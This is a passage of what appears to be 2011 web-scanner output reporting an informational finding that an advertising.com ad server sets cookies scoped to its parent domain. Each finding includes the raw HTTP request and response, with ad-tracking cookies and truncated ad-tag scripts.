C2=y2j+NFJwHob0Fz6sIWwJoa8jtKPCC0nBhJpwEg02FkMBdbdBJTwihXQyEwjmGkMBxGeBJTAQvaQyEQW4FkMBLppBJTQghXQyEgN5FkMB6ijBJTAmhXQyEAY4FkMBdDmBJTA/yaQyEAVZGkMBYimBJTA3WaQyEQY4FkMBFGeBJTAxBaQyEU1aGkMBbTeBJTQwBaQyEYnXGkMBWGoBJTgQvaQyEogmGkMBxmpBJTQRgaQyE0soGkMB8mpBJHZAmZOiGwZj0jw+NXActiGA8Mohn7a+AcsmGeuAEOpREbLuBoKuGy/smJwokaExzClALRqREXaxAMdPGfwrQQwdIaMi; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
F1=BIbP63EBAAAABAAAAYAAcCA; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
BASE=x7Q9Ri23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCFhyHZGl9O!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
ROLL=U6APDjemptEW07O!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
12937368=_4dfa3db2,0386523300,768034^956561^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768034/size=728090/u=2/bnum=12937368/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308245424385&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; C2=Xmg+NFJwHob0Ff7sIWwJoasmtKPCC0nBsJpwEg02FQNBdbdBUTwihXA1EwjmGQNBxGeBUTAQvaA1EQW4FQNBLppBUTQghXA1EgN5FQNB6ijBUTAmhXA1EAY4FQNBdDmBUTA/yaA1EAVZGQNBYimBUTA3WaA1EQY4FQNBFGeBUTAxBaA1EU1aGQNBbTeBUTQwBaA1EYnXGQNBWGoBUTgQvaA1EogmGQNBxmpBUTQRgaA1E0soGQNB8mpBUDrnA8ekGeQkBAAoNX8BmZOiGcKtyBw2sa4BNSPC73cBw1KaAwzgGKvr5Dwxaao8CQ4kG9st4Kgq4a4BzamAjSqRPPLUCsEpG9cpFDw09YsEvCBB3hoxTC; F1=BcZC63EBAAAABAAAAUAA0DA; BASE=x7Q9Ri23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCFhyHBGl9O!; ROLL=U6APHje2RKFWN9uaB4l2AhxSqVDmeNFaNHEC/OJMf0r/dZP!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.956561.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 17:30:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667
Date: Thu, 16 Jun 2011 17:30:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=y2j+NFJwHob0Fz6sIWwJoa8jtKPCC0nBhJpwEg02FkMBdbdBJTwihXQyEwjmGkMBxGeBJTAQvaQyEQW4FkMBLppBJTQghXQyEgN5FkMB6ijBJTAmhXQyEAY4FkMBdDmBJTA/yaQyEAVZGkMBYimBJTA3WaQyEQY4FkMBFGeBJTAxBaQyEU1aGkMBbTeBJTQwBaQyEYnXGkMBWGoBJTgQvaQyEogmGkMBxmpBJTQRgaQyE0soGkMB8mpBJHZAmZOiGwZj0jw+NXActiGA8Mohn7a+AcsmGeuAEOpREbLuBoKuGy/smJwokaExzClALRqREXaxAMdPGfwrQQwdIaMi; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
Set-Cookie: F1=BIbP63EBAAAABAAAAYAAcCA; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
Set-Cookie: BASE=x7Q9Ri23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCFhyHZGl9O!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
Set-Cookie: ROLL=U6APDjemptEW07O!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
Set-Cookie: 12937368=_4dfa3db2,0386523300,768034^956561^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000956
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=16141575/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=Cxk+NFJwHob0Fn6sIWwJoaMjtKPCC0nBeJpwEg02FYMBdbdBGTwihXgxEwjmGYMBxGeBGTAQvagxEQW4FYMBLppBGTQghXgxEgN5FYMB6ijBGTAmhXgxEAY4FYMBdDmBGTA/yagxEAVZGYMBYimBGTA3WagxEQY4FYMBFGeBGTAxBagxEU1aGYMBbTeBGTQwBagxEYnXGYMBWGoBGTgQvagxEogmGYMBxmpBGTQRgagxE0soGYMB8mpBGHZAmZOiGkZj0jw+NXsbtiGA8Mohk7a+AcsmGSuAEOpRBbLuBoKuGm/smJwokaUwzClALRqRBXaxAMdPGTwrQQwdIachq62ApVmhvTqHIUbNG+G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
F1=BIET63EBAAAABAAAAEBAECA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
BASE=x7Q9ai23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkeCsdUykM!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
ROLL=U6APOjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3DH4tHf2C!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
16141575=_4dfa4c42,7722412680,768034^994447^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768034/size=728090/u=2/bnum=16141575/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308249152535&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=Lsk+NFJwHob0Fo6sIWwJoaQjtKPCC0nReJpwEg02FZMBdbdRGTwihXkxEwjmGZMBxGeRGTAQvakxEQW4FZMBLppRGTQghXkxEgN5FZMB6ijRGTAmhXkxEAY4FZMBdDmRGTA/yakxEAVZGZMBYimRGTA3WakxEQY4FZMBFGeRGTAxBakxEU1aGZMBbTeRGTQwBakxEYnXGZMBWGoRGTgQvakxEogmGZMBxmpRGTQRgakxE0soGZMB8mpRGHZAmZOiGlZj0jw+NXwbtiGA8Moxk7a+AcsmGTuAEOphBbLuBoKuGn/smJwokaYwzClALRqhBXaxAMdPGUwrQQwdIaghq62ApVmxvTqHIUbNG/G; F1=BswS63EBAAAABAAAAABAGCA; BASE=x7Q9Zi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOE!; ROLL=U6APJjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9dH!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.994447.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:32:34 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 602
Date: Thu, 16 Jun 2011 18:32:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=Cxk+NFJwHob0Fn6sIWwJoaMjtKPCC0nBeJpwEg02FYMBdbdBGTwihXgxEwjmGYMBxGeBGTAQvagxEQW4FYMBLppBGTQghXgxEgN5FYMB6ijBGTAmhXgxEAY4FYMBdDmBGTA/yagxEAVZGYMBYimBGTA3WagxEQY4FYMBFGeBGTAxBagxEU1aGYMBbTeBGTQwBagxEYnXGYMBWGoBGTgQvagxEogmGYMBxmpBGTQRgagxE0soGYMB8mpBGHZAmZOiGkZj0jw+NXsbtiGA8Mohk7a+AcsmGSuAEOpRBbLuBoKuGm/smJwokaUwzClALRqRBXaxAMdPGTwrQQwdIachq62ApVmhvTqHIUbNG+G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: F1=BIET63EBAAAABAAAAEBAECA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: BASE=x7Q9ai23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkeCsdUykM!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: ROLL=U6APOjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3DH4tHf2C!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: 16141575=_4dfa4c42,7722412680,768034^994447^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6333.272756.AOL-ADVERTISING/B5305142.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mn
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=1625138/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=/Ok+NFJwHob0Fu6sIWwJoaojtKPCC0nxfJpwEg02FfMBdbdxHTwihX8xEwjmGfMBxGexHTAQva8xEQW4FfMBLppxHTQghX8xEgN5FfMB6ijxHTAmhX8xEAY4FfMBdDmxHTA/ya8xEAVZGfMBYimxHTA3Wa8xEQY4FfMBFGexHTAxBa8xEU1aGfMBbTexHTQwBa8xEYnXGfMBWGoxHTgQva8xEogmGfMBxmpxHTQRga8xE0soGfMB8mpxHHZAmZOiGrZj0jw+NXsbtiGA8MoRm7a+AcsmGZuAEOpBDbLuBoKuGt/smJwokawwzClALRqBDXaxAMdPGawrQQwdIa4h; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
F1=B87Q63EBAAAABAAAAgAASCA; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
BASE=x7Q9Si23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1A!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
ROLL=U6APBjemptEW07uaB4l2FnxkoJDmaLF!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
1625138=_4dfa43bf,0557655566,768034^924217^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768034/size=728090/u=2/bnum=1625138/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308246973695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; C2=y2j+NFJwHob0Fz6sIWwJoa8jtKPCC0nBhJpwEg02FkMBdbdBJTwihXQyEwjmGkMBxGeBJTAQvaQyEQW4FkMBLppBJTQghXQyEgN5FkMB6ijBJTAmhXQyEAY4FkMBdDmBJTA/yaQyEAVZGkMBYimBJTA3WaQyEQY4FkMBFGeBJTAxBaQyEU1aGkMBbTeBJTQwBaQyEYnXGkMBWGoBJTgQvaQyEogmGkMBxmpBJTQRgaQyE0soGkMB8mpBJHZAmZOiGwZj0jw+NXActiGA8Mohn7a+AcsmGeuAEOpREbLuBoKuGy/smJwokaExzClALRqREXaxAMdPGfwrQQwdIaMi; F1=BIbP63EBAAAABAAAAcAAcCA; BASE=x7Q9Ri23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9O!; ROLL=U6APAjemptEW07uaB4l2FnB!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.924217.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 17:56:15 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 604
Date: Thu, 16 Jun 2011 17:56:15 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=/Ok+NFJwHob0Fu6sIWwJoaojtKPCC0nxfJpwEg02FfMBdbdxHTwihX8xEwjmGfMBxGexHTAQva8xEQW4FfMBLppxHTQghX8xEgN5FfMB6ijxHTAmhX8xEAY4FfMBdDmxHTA/ya8xEAVZGfMBYimxHTA3Wa8xEQY4FfMBFGexHTAxBa8xEU1aGfMBbTexHTQwBa8xEYnXGfMBWGoxHTgQva8xEogmGfMBxmpxHTQRga8xE0soGfMB8mpxHHZAmZOiGrZj0jw+NXsbtiGA8MoRm7a+AcsmGZuAEOpBDbLuBoKuGt/smJwokawwzClALRqBDXaxAMdPGawrQQwdIa4h; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
Set-Cookie: F1=B87Q63EBAAAABAAAAgAASCA; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
Set-Cookie: BASE=x7Q9Si23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1A!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
Set-Cookie: ROLL=U6APBjemptEW07uaB4l2FnxkoJDmaLF!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
Set-Cookie: 1625138=_4dfa43bf,0557655566,768034^924217^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.6;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=000076803
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=27582677/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=dik+NFJwHob0Fq6sIWwJoaYjtKPCC0nxeJpwEg02FbMBdbdxGTwihXsxEwjmGbMBxGexGTAQvasxEQW4FbMBLppxGTQghXsxEgN5FbMB6ijxGTAmhXsxEAY4FbMBdDmxGTA/yasxEAVZGbMBYimxGTA3WasxEQY4FbMBFGexGTAxBasxEU1aGbMBbTexGTQwBasxEYnXGbMBWGoxGTgQvasxEogmGbMBxmpxGTQRgasxE0soGbMB8mpxGHZAmZOiGnZj0jw+NX4btiGA8MoRl7a+AcsmGVuAEOpBCbLuBoKuGp/smJwokagwzClALRqBCXaxAMdPGWwrQQwdIaoh; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
F1=B0JS63EBAAAABAAAA0AAKCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
BASE=x7Q9Wi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4voCFHNEzrE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
ROLL=U6APKjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2euWp6DkcN!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
27582677=_4dfa489d,2306156771,768034^1004441^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768034/size=728090/u=2/bnum=27582677/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308248219121&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=qdk+NFJwHob0Fr6sIWwJoacjtKPCC0nBfJpwEg02FcMBdbdBHTwihXwxEwjmGcMBxGeBHTAQvawxEQW4FcMBLppBHTQghXwxEgN5FcMB6ijBHTAmhXwxEAY4FcMBdDmBHTA/yawxEAVZGcMBYimBHTA3WawxEQY4FcMBFGeBHTAxBawxEU1aGcMBbTeBHTQwBawxEYnXGcMBWGoBHTgQvawxEogmGcMBxmpBHTQRgawxE0soGcMB8mpBHHZAmZOiGoZj0jw+NX8btiGA8Mohl7a+AcsmGWuAEOpRCbLuBoKuGq/smJwokakwzClALRqRCXaxAMdPGXwrQQwdIash; F1=Bo2R63EBAAAABAAAAwAAMCA; BASE=x7Q9Vi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vI!; ROLL=U6APFjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2O!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1004441.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:17:01 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 641
Date: Thu, 16 Jun 2011 18:17:01 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=dik+NFJwHob0Fq6sIWwJoaYjtKPCC0nxeJpwEg02FbMBdbdxGTwihXsxEwjmGbMBxGexGTAQvasxEQW4FbMBLppxGTQghXsxEgN5FbMB6ijxGTAmhXsxEAY4FbMBdDmxGTA/yasxEAVZGbMBYimxGTA3WasxEQY4FbMBFGexGTAxBasxEU1aGbMBbTexGTQwBasxEYnXGbMBWGoxGTgQvasxEogmGbMBxmpxGTQRgasxE0soGbMB8mpxGHZAmZOiGnZj0jw+NX4btiGA8MoRl7a+AcsmGVuAEOpBCbLuBoKuGp/smJwokagwzClALRqBCXaxAMdPGWwrQQwdIaoh; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: F1=B0JS63EBAAAABAAAA0AAKCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: BASE=x7Q9Wi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4voCFHNEzrE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: ROLL=U6APKjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2euWp6DkcN!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: 27582677=_4dfa489d,2306156771,768034^1004441^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript1.1" src="http://ebay.adnxs.com/ttj?id=472678&cb=2306156771&pt1=0000768034&pt2=0001004441&pt3=1183&imp_id=v2:I:1308248221:2306156771:0000768034:0001004441:1
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=28183863/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=31k+NFJwHob0Fm6sIWwJoaIjtKPCC0nxdJpwEg02FXMBdbdxFTwihXcxEwjmGXMBxGexFTAQvacxEQW4FXMBLppxFTQghXcxEgN5FXMB6ijxFTAmhXcxEAY4FXMBdDmxFTA/yacxEAVZGXMBYimxFTA3WacxEQY4FXMBFGexFTAxBacxEU1aGXMBbTexFTQwBacxEYnXGXMBWGoxFTgQvacxEogmGXMBxmpxFTQRgacxE0soGXMB8mpxFHZAmZOiGjZj0jw+NXobtiGA8MoRk7a+AcsmGRuAEOpBBbLuBoKuGl/smJwokaQwzClALRqBBXaxAMdPGSwrQQwdIaYhq62ApVmRvTqHIUbNG9G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
F1=BcXT63EBAAAABAAAAIBACCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
